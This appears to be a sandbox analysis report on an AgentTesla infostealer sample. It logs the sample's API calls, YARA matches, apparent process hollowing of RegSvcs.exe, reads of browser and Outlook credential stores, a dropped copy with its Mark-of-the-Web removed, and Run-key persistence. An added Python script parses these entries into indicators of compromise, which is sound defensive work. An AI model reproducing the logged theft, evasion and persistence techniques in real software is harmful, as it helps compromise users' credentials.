Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F7C3 GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094B715 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00976685 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74F75590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0095B043
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00943200
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096410F
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009502A4
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096038E
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0093E3B0
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009506D9
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096467F
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099AACE
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00964BEF
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0095CCC1
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00936F07
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0093AF50
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009931BC
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0095D1B9
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094B11F
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0095123A
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096724D
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009713CA
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009393F0
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094F563
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009396C0
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0097B6CC
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009377B0
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0099F7FF
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009679C9
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094FA57
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00943B70
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00939B60
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00937D19
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00959ED0
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094FE6F
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00937FA3
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_018BAA98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00F0A9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00F09D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00F0A0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00F073B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060DC760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060D0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060D694A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060DD878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060DD928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_06115078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_06115DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_061130C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_061221B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0612DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_06138690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_061316B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_06130A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_06134A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613B747
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613B748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613D290
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: String function 0094EC2F appears 68 times
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: String function 00956AC0 appears 42 times
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: String function 0095F8A0 appears 35 times
Source: SOA_9828392091.exe, 00000000.00000003.2121651808.0000000004023000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dll (vs SOA_9828392091.exe)
Source: SOA_9828392091.exe, 00000000.00000003.2117698741.00000000041CD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dll (vs SOA_9828392091.exe)
Source: SOA_9828392091.exe, 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename 42805d09-10a7-49d5-a54d-c85a34de8bb7.exe (vs SOA_9828392091.exe)
Source: SOA_9828392091.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Matched Yara rules (rule metadata listed once; each match below names the rule):
Windows_Trojan_AgentTesla_d3ac2b2f: reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
MALWARE_Win_AgentTeslaV3: author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3
Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV3
Source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f
Source: SOA_9828392091.exe | Static PE information: Section UPX1, ZLIB complexity 0.9887368824294205
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, G.cs | Cryptographic APIs: 'TransformFinalBlock' (3 methods)
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, G.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.cs | Cryptographic APIs: 'TransformFinalBlock' (9 methods)
Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/1
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0097CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0096B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0097E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00976532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0098C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0093406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\yGbzOMp
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
Source: C:\Users\user\Desktop\SOA_9828392091.exe | File created: C:\Users\user\AppData\Local\Temp\aut87C6.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SOA_9828392091.exe | ReversingLabs: Detection: 39%
Source: SOA_9828392091.exe | Virustotal: Detection: 28%
Source: unknown | Process created: C:\Users\user\Desktop\SOA_9828392091.exe "C:\Users\user\Desktop\SOA_9828392091.exe"
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA_9828392091.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe (identical for both instances) | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe (identical for both instances) | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe (identical for both instances) | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe (identical for both instances) | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe (identical for both instances) | Section loaded: ucrtbase_clr0400.dll (loaded twice)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: RegSvcs.pdb | source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
Source: Binary string: wntdll.pdbUGP | source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00A55F70 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_009C05B8 push ss; ret 0_2_009C05B9
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00956B05 push ecx; ret 0_2_00956B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060DC65A push ds; ret 2_2_060DC661
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060DB0CA push 8BFFFFFFh; retf 2_2_060DB0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_060DBB7A push es; ret 2_2_060DBB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_06112623 push esp; ret 2_2_06112671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A22B push es; retf 2_2_0611A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A2C3 push es; retf 2_2_0611A358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A35B push es; retf 2_2_0611A358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611B795 push es; ret 2_2_0611B798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3D3 push es; retf 2_2_0611A3D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3D7 push es; retf 2_2_0611A3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3DB push es; retf 2_2_0611A3DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3DF push es; retf 2_2_0611A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3F3 push es; retf 2_2_0611A3F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3E3 push es; retf 2_2_0611A3E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3E7 push es; retf 2_2_0611A3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3EB push es; retf 2_2_0611A3EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A3EF push es; retf 2_2_0611A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A119 push es; retf 2_2_0611A190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611B9D5 push es; retf 2_2_0611BB6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A1DB push es; retf 2_2_0611A1DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0611A1F1 push es; retf 2_2_0611A228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613C43E pushad ; ret 2_2_0613C48D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613A455 push edi; iretd 2_2_0613A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_061364B9 push es; retf 2_2_06136828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613C5CE pushfd ; ret 2_2_0613C61D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0613C3EE push esp; ret 2_2_0613C43D
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe (dropped file)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yGbzOMp (written twice)
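The behaviour entries above carry the whole infection chain in one place: the AutoIt loader starts RegSvcs.exe with the loader's own path as the command line (the command line names a different executable than the image, which is the visible trace of the payload being written into the .NET host), RegSvcs.exe then drops yGbzOMp.exe under AppData\Roaming, strips its Zone.Identifier stream and registers it under the HKCU Run key. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's fused "Source: <src><Label>: <value>" form (with or without the trailing "Jump to ..." link text) into a small IOC set and flags the image/command-line mismatch and the drop-then-persist chain. The sample lines are constructed from this report's entries; the label list and the chain heuristics are this example's own assumptions, not a Joe Sandbox API.

```python
import re

# Constructed sample: behaviour entries copied from this report (the trailing
# "Jump to ..." link text is left in on purpose so the parser shows it is stripped).
SAMPLE_LINES = [
    r'Source: unknownProcess created: C:\Users\user\Desktop\SOA_9828392091.exe "C:\Users\user\Desktop\SOA_9828392091.exe"',
    r'Source: C:\Users\user\Desktop\SOA_9828392091.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA_9828392091.exe"Jump to behavior',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeJump to dropped file',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yGbzOMpJump to behavior',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe:Zone.Identifier read attributes | deleteJump to behavior',
    r'Source: unknownProcess created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"',
    r'Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

# Labels this example knows about (an assumption; the report uses more).
LABELS = ("Process created", "File created", "File opened",
          "Registry value created or modified", "Mutant created")

# Source and label are fused in the extracted text ("...exeProcess created:"),
# so the source is matched lazily up to the first known label.
_LINE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*(?P<label>" + "|".join(LABELS) + r"):\s*"
    r"(?P<value>.*?)\s*(?:Jump to behavior|Jump to dropped file)?\s*$"
)
# "<image path> <command line>" is how the report prints a process creation.
_PROC = re.compile(r"^(?P<image>\S+?\.exe)\s+(?P<cmd>.*)$", re.IGNORECASE)


def parse_line(line):
    """Return (source, label, value) for a behaviour line, or None if it is not one."""
    m = _LINE.match(line)
    return (m.group("src"), m.group("label"), m.group("value")) if m else None


def command_executable(cmd):
    """First token of a Windows command line, honouring a quoted program path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split(None, 1)[0] if cmd else ""


def build_iocs(lines):
    """Collect process tree, hollowing suspects, dropped PEs, Run keys and MotW removals."""
    iocs = {"process_tree": [], "hollowing_suspects": [], "dropped": set(),
            "run_keys": set(), "motw_removed": set()}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, label, value = parsed
        if label == "Process created":
            m = _PROC.match(value)
            if not m:
                continue
            image, exe = m.group("image"), command_executable(m.group("cmd"))
            iocs["process_tree"].append((src, image))
            # A command line naming a different executable than the image is the
            # trace of the hollowed RegSvcs.exe in this report: the AutoIt loader
            # starts the .NET host with the loader's own path as its command line.
            if exe.lower() != image.lower():
                iocs["hollowing_suspects"].append((image, exe))
        elif label == "File created" and value.lower().endswith(".exe"):
            iocs["dropped"].add(value)
        elif label == "Registry value created or modified" and "\\CurrentVersion\\Run" in value:
            iocs["run_keys"].add(value)
        elif label == "File opened" and ":Zone.Identifier" in value and "delete" in value:
            # Deleting the Zone.Identifier stream removes the Mark-of-the-Web.
            iocs["motw_removed"].add(value.split(":Zone.Identifier", 1)[0])
    return iocs


def persistence_chain(iocs):
    """Dropped executables that also lost their MotW and are named in a Run value."""
    chained = []
    for path in sorted(iocs["dropped"]):
        name = path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        if path in iocs["motw_removed"] and any(k.endswith(" " + name) for k in iocs["run_keys"]):
            chained.append(path)
    return chained


if __name__ == "__main__":
    result = build_iocs(SAMPLE_LINES)
    for parent, image in result["process_tree"]:
        print(f"{parent} -> {image}")
    print("hollowing suspects:", result["hollowing_suspects"])
    print("persistence chain:", persistence_chain(result))
```

The image-versus-command-line check deliberately compares only the first token, so the conhost.exe launch (image and command line agree, only the casing differs) is not flagged while the RegSvcs.exe launch is; on a real host the same comparison can be run over Sysmon event ID 1 records, where the Image and CommandLine fields carry the same two values.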

                Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00998111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0094EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0095123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (entry repeated 62 times)
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe | Process information set: NOOPENFILEERRORBOX (entry repeated 17 times)
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
